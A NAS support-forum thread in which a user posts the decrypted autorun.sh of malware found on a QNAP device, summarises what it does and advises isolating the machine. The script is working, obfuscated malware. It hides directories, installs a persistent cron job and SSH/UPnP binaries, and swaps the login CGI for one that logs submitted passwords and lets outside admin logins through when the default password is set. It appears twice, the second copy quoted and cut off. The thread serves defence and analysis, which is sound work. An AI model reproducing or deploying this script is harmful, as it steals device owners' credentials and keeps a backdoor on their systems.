Strange folders and cronjobs

Questions about SNMP, Power, System, Logs, disk, & RAID.
Post Reply
User avatar
dolbyman
Guru
Posts: 34903
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Strange folders and cronjobs

Post by dolbyman »

8TB external drives are cheap..should be plenty of space for movies
benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 »

dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
User avatar
dolbyman
Guru
Posts: 34903
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Strange folders and cronjobs

Post by dolbyman »

User avatar
Don
Guru
Posts: 12289
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don »

benzo83 wrote:Can i safetely remove these files? Can any QNAP'S employee answer me?
No QNAP's employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.
Use the forum search feature before posting.

Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
Mousetick
Experience counts
Posts: 1081
Joined: Thu Aug 24, 2017 10:28 pm

Re: Strange folders and cronjobs

Post by Mousetick »

This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Decrypted autorun.sh:

Code: Select all

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } 
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" 
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && { 
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` 

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then 
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } 
true;
}


#]
benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 »

Mousetick wrote:This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Decrypted autorun.sh:

Code: Select all

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } 
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" 
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && { 
